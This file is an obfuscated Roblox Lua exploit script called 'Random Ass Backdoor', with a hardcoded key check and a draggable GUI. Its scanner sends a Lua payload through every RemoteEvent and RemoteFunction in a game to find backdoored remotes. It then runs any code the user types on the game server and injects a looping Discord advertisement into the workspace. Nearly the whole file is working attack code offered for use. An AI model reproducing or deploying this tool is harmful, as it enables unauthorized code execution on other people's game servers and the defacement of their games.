--[[
______                _                    ___           ______            _       _                  
| ___ \              | |                  / _ \          | ___ \          | |     | |                 
| |_/ /__ _ _ __   __| | ___  _ __ ___   / /_\ \___ ___  | |_/ / __ _  ___| | ____| | ___   ___  _ __ 
|    // _` | '_ \ / _` |/ _ \| '_ ` _ \  |  _  / __/ __| | ___ \/ _` |/ __| |/ / _` |/ _ \ / _ \| '__|
| |\ \ (_| | | | | (_| | (_) | | | | | | | | | \__ \__ \ | |_/ / (_| | (__|   < (_| | (_) | (_) | |   
\_| \_\__,_|_| |_|\__,_|\___/|_| |_| |_| \_| |_/___/___/ \____/ \__,_|\___|_|\_\__,_|\___/ \___/|_|
              Random Ass Backdoor (Version 2) - By exvy
]]--

local v0=game:GetService("Players");local v1=v0.LocalPlayer;local v2=v1:WaitForChild("PlayerGui");local v3="Random Ass Backdoor";local v4={"leakingdontwork?","HttpService","PremiumVersion","Dev.Test"};local v5={Color={r=0,g=0,b=1},Transparency=0.1,Discord="envysplague",AutoInject=false};local v6={Color={r=1,g=0,b=0},Transparency=0.1,Discord="envysplague",AutoInject=true,DevMode=true,SkipKeyCheck=true,InstantSkip=true,AdminAccess=true,PremiumFeatures=true};local function v7(v18) for v157,v158 in ipairs(v4) do if (v18==v158) then return true;end end return false;end local function v8(v19) return v19=="HttpService" ;end local function v9(v20) return v20=="PremiumVersion" ;end local function v10(v21) return v21=="Dev.Test" ;end local function v11() if  not isfolder(v3) then makefolder(v3);end end local function v12(v22,v23) v11();local v24=(v23 and "dev_config.txt") or "config.txt" ;local v25="";for v159,v160 in pairs(v22) do if ((type(v160)=="table") and v160.r and v160.g and v160.b) then v25=v25   .. v159   .. "="   .. v160.r   .. ","   .. v160.g   .. ","   .. v160.b   .. "\n" ;else v25=v25   .. v159   .. "="   .. tostring(v160)   .. "\n" ;end end local v26,v27=pcall(function() writefile(v3   .. "/"   .. v24 ,v25);end);return v26;end local function v13(v28) v11();local v29=(v28 and "dev_config.txt") or "config.txt" ;local v30=(v28 and v6) or v5 ;if isfile(v3   .. ("/" + v29) ) then local v266,v267=pcall(function() return readfile(v3   .. ("/" + v29) );end);if v266 then for v358 in v267:gmatch("[^\r\n]+") do local v359,v360=v358:match("([^=]+)=(.+)");if (v359 and v360) then if v360:match("^%d+,%d+,%d+$") then local v373,v374,v375=v360:match("([^,]+),([^,]+),([^,]+)");v30[v359]={r=tonumber(v373),g=tonumber(v374),b=tonumber(v375)};elseif (v360=="true") then v30[v359]=true;elseif (v360=="false") then v30[v359]=false;elseif tonumber(v360) then v30[v359]=tonumber(v360);else v30[v359]=v360;end end end end end return v30;end local function v14(v31) if  not v7(v31) then return false;end v11();local v32,v33=pcall(function() writefile(v3   .. "/key.txt" ,v31);end);if  not v32 then warn("save error: "   .. v33 );return false;end if v10(v31) then v12(v6,true);elseif v8(v31) then local v344=v13(false);v344.Color={r=0,g=1,b=0};v12(v344,false);elseif v9(v31) then local v363=v13(false);v363.Color={r=1,g=0.84,b=0};v12(v363,false);else v12(v5,false);end return true;end local function v15() v11();if  not isfile(v3   .. "/key.txt" ) then return nil;end local v34,v35=pcall(function() return readfile(v3   .. "/key.txt" );end);if v34 then return v35;end return nil;end local function v16(v36) local v37=v10(v36);local v38=v8(v36);local v39=v9(v36);local v40=v13(v37);local v41=Color3.new(v40.Color.r,v40.Color.g,v40.Color.b);local v42=Instance.new("ScreenGui");v42.Name="BackdoorGUI";v42.ResetOnSpawn=false;v42.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v42.Parent=v2;local v48=Instance.new("Frame");v48.Parent=v42;v48.BackgroundColor3=v41;v48.BackgroundTransparency=v40.Transparency;v48.BorderColor3=Color3.fromRGB(0,0,0);v48.BorderSizePixel=0;v48.Position=UDim2.new(0.248322144,0,0.35603112,0);v48.Size=UDim2.new(0,305,0,185);v48.Active=true;v48.Draggable=true;local v59=Instance.new("UICorner");v59.CornerRadius=UDim.new(0,3);v59.Parent=v48;local v62=Instance.new("TextLabel");v62.Parent=v48;v62.BackgroundColor3=Color3.fromRGB(255,255,255);v62.BackgroundTransparency=1;v62.BorderColor3=Color3.fromRGB(0,0,0);v62.BorderSizePixel=0;v62.Position=UDim2.new(0.144262299,0,0,0);v62.Size=UDim2.new(0,252,0,50);v62.Font=Enum.Font.SourceSans;v62.Text="Random Ass Backdoor";if v37 then v62.Text=v62.Text   .. "  [DEV]" ;elseif v38 then v62.Text=v62.Text   .. "  [ADMIN]" ;elseif v39 then v62.Text=v62.Text   .. "  [PREMIUM]" ;end v62.TextColor3=Color3.fromRGB(255,255,255);v62.TextSize=25;v62.TextXAlignment=Enum.TextXAlignment.Left;local v77=Instance.new("ImageLabel");v77.Parent=v48;v77.BackgroundColor3=Color3.fromRGB(255,255,255);v77.BackgroundTransparency=1;v77.BorderColor3=Color3.fromRGB(0,0,0);v77.BorderSizePixel=0;v77.Size=UDim2.new(0,50,0,50);v77.Image="rbxasset://textures/ui/GuiImagePlaceholder.png";local v85=Instance.new("TextBox");v85.Parent=v48;v85.BackgroundColor3=Color3.fromRGB(44,44,44);v85.BackgroundTransparency=0.5;v85.BorderColor3=Color3.fromRGB(0,0,0);v85.BorderSizePixel=0;v85.Position=UDim2.new(0.321311474,0,0.270270258,0);v85.Size=UDim2.new(0,198,0,124);v85.Font=Enum.Font.SourceSans;v85.Text="Discord: "   .. v40.Discord ;v85.TextColor3=Color3.fromRGB(0,0,0);v85.TextSize=14;v85.TextXAlignment=Enum.TextXAlignment.Left;v85.TextYAlignment=Enum.TextYAlignment.Top;local v100=Instance.new("TextButton");v100.Parent=v48;v100.BackgroundColor3=Color3.fromRGB(44,44,44);v100.BorderColor3=Color3.fromRGB(0,0,0);v100.BorderSizePixel=0;v100.Position=UDim2.new(0.0262295082,0,0.74594593,0);v100.Size=UDim2.new(0,75,0,36);v100.Font=Enum.Font.SourceSans;v100.Text="Execute";v100.TextColor3=Color3.fromRGB(0,0,0);v100.TextSize=20;local v111=Instance.new("TextButton");v111.Parent=v48;v111.BackgroundColor3=Color3.fromRGB(44,44,44);v111.BorderColor3=Color3.fromRGB(0,0,0);v111.BorderSizePixel=0;v111.Position=UDim2.new(0.0262295082,0,0.270270258,0);v111.Size=UDim2.new(0,75,0,36);v111.Font=Enum.Font.SourceSans;v111.Text="Clear";v111.TextColor3=Color3.fromRGB(0,0,0);v111.TextSize=20;local v122=Instance.new("TextButton");v122.Parent=v48;v122.BackgroundColor3=Color3.fromRGB(44,44,44);v122.BorderColor3=Color3.fromRGB(0,0,0);v122.BorderSizePixel=0;v122.Position=UDim2.new(0.0262295082,0,0.508108079,0);v122.Size=UDim2.new(0,75,0,36);v122.Font=Enum.Font.SourceSans;v122.Text="Inject";v122.TextColor3=Color3.fromRGB(0,0,0);v122.TextSize=20;local v133=Instance.new("TextButton");v133.Parent=v48;v133.BackgroundColor3=Color3.fromRGB(255,255,255);v133.BackgroundTransparency=1;v133.BorderColor3=Color3.fromRGB(0,0,0);v133.BorderSizePixel=0;v133.Position=UDim2.new(0.885245919,0,0,0);v133.Size=UDim2.new(0,35,0,35);v133.Font=Enum.Font.SourceSans;v133.Text="x";v133.TextColor3=Color3.fromRGB(255,0,0);v133.TextSize=30;v133.TextYAlignment=Enum.TextYAlignment.Top;local function v146() local v161=Instance.new("LocalScript",v48);local v162=v161.Parent;local v163=game:GetService("UserInputService");local v164=false;local v165;local v166;local v167;local function v168(v269) local v270=v269.Position-v166 ;v162.Position=UDim2.new(v167.X.Scale,v167.X.Offset + v270.X ,v167.Y.Scale,v167.Y.Offset + v270.Y );end v162.InputBegan:Connect(function(v272) if ((v272.UserInputType==Enum.UserInputType.MouseButton1) or (v272.UserInputType==Enum.UserInputType.Touch)) then v164=true;v166=v272.Position;v167=v162.Position;v272.Changed:Connect(function() if (v272.UserInputState==Enum.UserInputState.End) then v164=false;end end);end end);v162.InputChanged:Connect(function(v273) if ((v273.UserInputType==Enum.UserInputType.MouseMovement) or (v273.UserInputType==Enum.UserInputType.Touch)) then v165=v273;end end);v163.InputChanged:Connect(function(v274) if ((v274==v165) and v164) then v168(v274);end end);end coroutine.wrap(v146)();local function v147() local v169=Instance.new("LocalScript",v62);local v170=v169.Parent;local v171=0;while true do v171=v171 + 0.01 ;if (v171>1) then v171=0;end v170.TextColor3=Color3.fromHSV(v171,1,1);task.wait(0.03);end end coroutine.wrap(v147)();local function v148() local v172=Instance.new("LocalScript",v77);local v173=game:GetService("Players");local v174=v173.LocalPlayer;local v175=v172.Parent;if (v175 and v174) then local v325=v174.UserId;local v326="https://www.roblox.com/avatar-thumbnail/image?userId="   .. v325   .. "&width=420&height=420&format=png&type=bust" ;v175.Image=v326;end end coroutine.wrap(v148)();local function v149() local v176=Instance.new("LocalScript",v85);local v177=v176.Parent;local v178=0;while true do v178=v178 + 0.01 ;if (v178>1) then v178=0;end v177.TextColor3=Color3.fromHSV(v178,1,1);task.wait(0.03);end end coroutine.wrap(v149)();local function v150() local v179=Instance.new("LocalScript",v85);local v180=v179.Parent;local v181=game:GetService("UserInputService");v180.TextWrapped=true;v180.MultiLine=true;local v184;local function v185(v277,v278) if ((v277.UserInputType==Enum.UserInputType.Keyboard) and (v277.KeyCode==Enum.KeyCode.Return)) then v180:ReleaseFocus();end end v180.Focused:Connect(function() v184=v181.InputBegan:Connect(v185);end);v180.FocusLost:Connect(function() if v184 then v184:Disconnect();v184=nil;end end);end coroutine.wrap(v150)();local function v151() local v186=Instance.new("LocalScript",v100);local v187=v186.Parent;local v188=0;while true do v188=v188 + 0.01 ;if (v188>1) then v188=0;end v187.TextColor3=Color3.fromHSV(v188,1,1);task.wait(0.03);end end coroutine.wrap(v151)();local function v152() local v189=Instance.new("LocalScript",v111);local v190=v189.Parent;local v191=0;while true do v191=v191 + 0.01 ;if (v191>1) then v191=0;end v190.TextColor3=Color3.fromHSV(v191,1,1);task.wait(0.03);end end coroutine.wrap(v152)();local function v153() local v192=Instance.new("LocalScript",v122);local v193=v192.Parent;local v194=0;while true do v194=v194 + 0.01 ;if (v194>1) then v194=0;end v193.TextColor3=Color3.fromHSV(v194,1,1);task.wait(0.03);end end coroutine.wrap(v153)();local function v154() local v195=Instance.new("LocalScript",v133);v195.Parent.MouseButton1Click:Connect(function() v195.Parent.Parent.Visible=false;end);end coroutine.wrap(v154)();local function v155() local v196=Instance.new("LocalScript",v48);local v197=v196.Parent.Parent;v197.ResetOnSpawn=false;end coroutine.wrap(v155)();local function v156() local v199={"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"};local v200=nil;local v201=game:GetService("HttpService");local v202=false;local function v203(v283,v284) local v285=print;if (v284==1) then v285=print;end if (v284==2) then v285=error;end if (v284==3) then v285=warn;end v285("Backdoor Scanner: "   .. v283 );end local function v204(v286) game:GetService("StarterGui"):SetCore("SendNotification",{Title="Backdoor Scanner",Duration=6,Text=v286});end local function v205(v287,v288) if v287:IsA("RemoteEvent") then v287:FireServer(v288);elseif v287:IsA("RemoteFunction") then spawn(function() v287:InvokeServer(v288);end);end end local function v206(v289) local v290="";for v328=1,v289 do v290=v290   .. v199[math.random(1, #v199)] ;end return v290;end local function v207() local v291=os.clock();local v292={};local v293;local v294=game:GetService("ReplicatedStorage"):FindFirstChild("lh"   .. ((game.PlaceId/6666) * 1337 * game.PlaceId) );if (v294 and v294:IsA("RemoteFunction")) then while true do v293=v206(math.random(12,30));if  not v292[v293] then break;end end spawn(function() v294:InvokeServer("backdoor scanner","a=Instance.new('Model',workspace)a.Name='"   .. v293   .. "'" );end);v292[v293]=v294;end for v329,v330 in game:GetDescendants() do if  not (v330:IsA("RemoteEvent") or v330:IsA("RemoteFunction")) then continue;end if (string.split(v330:GetFullName(),".")[1]=="RobloxReplicatedStorage") then v203("Roblox Replicated Storage ("   .. v330.Name   .. ")" ,1);continue;end if ((v330.Parent==game:GetService("ReplicatedStorage")) or (v330.Parent.Parent==game:GetService("ReplicatedStorage")) or (v330.Parent.Parent.Parent==game:GetService("ReplicatedStorage"))) then if (v330:FindFirstChild("__FUNCTION") or (v330.Name=="__FUNCTION")) then v203("Adonis filter detected ("   .. v330.Name   .. ")" ,1);continue;end if ((v330.Parent.Parent.Name=="HDAdminClient") and (v330.Parent.Name=="Signals")) then v203("HD Admin ("   .. v330.Name   .. ")" ,1);continue;end if (v330.Parent.Name=="DefaultChatSystemChatEvents") then v203("Chat event ("   .. v330.Name   .. ")" ,1);continue;end end while true do v293=v206(math.random(12,30));if  not v292[v293] then break;end end v205(v330,"a=Instance.new('Model',workspace)a.Name='"   .. v293   .. "'" );v292[v293]=v330;v203('Tested remote "'   .. v330:GetFullName()   .. '"' ,1);end for v332=1,100 do for v350,v351 in pairs(v292) do if workspace:FindFirstChild(v350) then v204("Backdoor found! "   .. (os.clock() -v291)   .. "s" );v200=v351;v203(v351:GetFullName(),3);v205(v351,"a=Instance.new('Hint')a.Text='Discord: envysplague, Discord.gg/kd9ET5B3TF'while true do a.Parent=workspace;wait(15)a:Remove()wait(30)end");return true;end end wait(0.1);end return false;end v100.MouseButton1Click:Connect(function() local v295=v85.Text;if v200 then v205(v200,v295);v100.Text="Executed!";task.wait(0.5);v100.Text="Execute";else v204("No backdoor found yet!");end end);v111.MouseButton1Click:Connect(function() v85.Text="";v111.Text="Cleared!";task.wait(0.5);v111.Text="Clear";end);v122.MouseButton1Click:Connect(function() if  not v202 then v202=true;v203("Scanning for backdoors...",3);v122.Text="Scanning...";if  not v207() then v122.Text="Failure";v202=false;else v122.Text="Injected";v202=false;end end end);if (v37 and v40.AutoInject) then task.spawn(function() task.wait(2);if  not v202 then v202=true;v203("Auto-injecting for Dev.Test...",3);v122.Text="Injecting";if v207() then v122.Text="Injected";v202=false;else v122.Text="Inject";v202=false;end end end);end game:GetService("UserInputService").InputBegan:Connect(function(v298,v299) if ((v298.KeyCode==Enum.KeyCode.LeftAlt) and  not v299) then v48.Visible= not v48.Visible;end end);end v156();end local v17=v15();if (v17 and v7(v17)) then v16(v17);else local v208=Instance.new("ScreenGui");v208.Name="KeySystem";v208.Parent=v2;local v211=Instance.new("Frame");local v212=Instance.new("TextButton");local v213=Instance.new("TextBox");local v214=Instance.new("TextLabel");v211.Parent=v208;v211.BackgroundColor3=Color3.fromRGB(0,0,0);v211.BorderColor3=Color3.fromRGB(0,0,0);v211.BorderSizePixel=0;v211.Position=UDim2.new(0.14337568,0,0.190661475,0);v211.Size=UDim2.new(0,169,0,165);v211.Active=true;v211.Draggable=true;v212.Parent=v211;v212.BackgroundColor3=Color3.fromRGB(44,44,44);v212.BorderColor3=Color3.fromRGB(0,0,0);v212.BorderSizePixel=0;v212.Position=UDim2.new(0.0662294626,0,0.787391424,0);v212.Size=UDim2.new(0,147,0,28);v212.Font=Enum.Font.SourceSans;v212.Text="Check";v212.TextColor3=Color3.fromRGB(0,0,0);v212.TextSize=20;v213.Parent=v211;v213.BackgroundColor3=Color3.fromRGB(44,44,44);v213.BackgroundTransparency=0.5;v213.BorderColor3=Color3.fromRGB(0,0,0);v213.BorderSizePixel=0;v213.Position=UDim2.new(0.0662294552,0,0.206060603,0);v213.Size=UDim2.new(0,147,0,86);v213.Font=Enum.Font.SourceSans;v213.Text="";v213.TextColor3=Color3.fromRGB(0,0,0);v213.TextSize=14;v213.TextXAlignment=Enum.TextXAlignment.Left;v213.TextYAlignment=Enum.TextYAlignment.Top;v214.Parent=v211;v214.BackgroundColor3=Color3.fromRGB(255,255,255);v214.BackgroundTransparency=1;v214.BorderColor3=Color3.fromRGB(0,0,0);v214.BorderSizePixel=0;v214.Position=UDim2.new(0.0613114387,0,0,0);v214.Size=UDim2.new(0,148,0,35);v214.Font=Enum.Font.SourceSans;v214.Text="Key System";v214.TextColor3=Color3.fromRGB(255,255,255);v214.TextSize=25;v214.TextXAlignment=Enum.TextXAlignment.Left;local function v261() local v300=Instance.new("LocalScript",v212);local v301=v300.Parent;local v302=0;while true do v302=v302 + 0.01 ;if (v302>1) then v302=0;end v301.TextColor3=Color3.fromHSV(v302,1,1);task.wait(0.03);end end coroutine.wrap(v261)();local function v262() local v303=Instance.new("LocalScript",v213);local v304=v303.Parent;local v305=0;while true do v305=v305 + 0.01 ;if (v305>1) then v305=0;end v304.TextColor3=Color3.fromHSV(v305,1,1);task.wait(0.03);end end coroutine.wrap(v262)();local function v263() local v306=Instance.new("LocalScript",v213);local v307=v306.Parent;local v308=game:GetService("UserInputService");v307.TextWrapped=true;v307.MultiLine=true;local v311;local function v312(v335,v336) if ((v335.UserInputType==Enum.UserInputType.Keyboard) and (v335.KeyCode==Enum.KeyCode.Return)) then v307:ReleaseFocus();end end v307.Focused:Connect(function() v311=v308.InputBegan:Connect(v312);end);v307.FocusLost:Connect(function() if v311 then v311:Disconnect();v311=nil;end end);end coroutine.wrap(v263)();local function v264() local v313=Instance.new("LocalScript",v214);local v314=v313.Parent;local v315=0;while true do v315=v315 + 0.01 ;if (v315>1) then v315=0;end v314.TextColor3=Color3.fromHSV(v315,1,1);task.wait(0.03);end end coroutine.wrap(v264)();local function v265() local v316=Instance.new("LocalScript",v211);local v317=v316.Parent;local v318=game:GetService("UserInputService");local v319=false;local v320;local v321;local v322;local function v323(v338) local v339=v338.Position-v321 ;v317.Position=UDim2.new(v322.X.Scale,v322.X.Offset + v339.X ,v322.Y.Scale,v322.Y.Offset + v339.Y );end v317.InputBegan:Connect(function(v341) if ((v341.UserInputType==Enum.UserInputType.MouseButton1) or (v341.UserInputType==Enum.UserInputType.Touch)) then v319=true;v321=v341.Position;v322=v317.Position;v341.Changed:Connect(function() if (v341.UserInputState==Enum.UserInputState.End) then v319=false;end end);end end);v317.InputChanged:Connect(function(v342) if ((v342.UserInputType==Enum.UserInputType.MouseMovement) or (v342.UserInputType==Enum.UserInputType.Touch)) then v320=v342;end end);v318.InputChanged:Connect(function(v343) if ((v343==v320) and v319) then v323(v343);end end);end coroutine.wrap(v265)();v212.MouseButton1Click:Connect(function() local v324=v213.Text:gsub("%s+","");if (v324=="") then v213.Text="please enter a key";task.wait(1.5);v213.Text="";return;end if v7(v324) then if v14(v324) then v213.Text="key accepted!";v213.TextColor3=Color3.fromRGB(0,255,0);task.wait(1.5);v208:Destroy();v16(v324);end else v213.Text="invalid key";v213.TextColor3=Color3.fromRGB(255,0,0);task.wait(1.5);v213.Text="";v213.TextColor3=Color3.fromRGB(0,0,0);end end);end
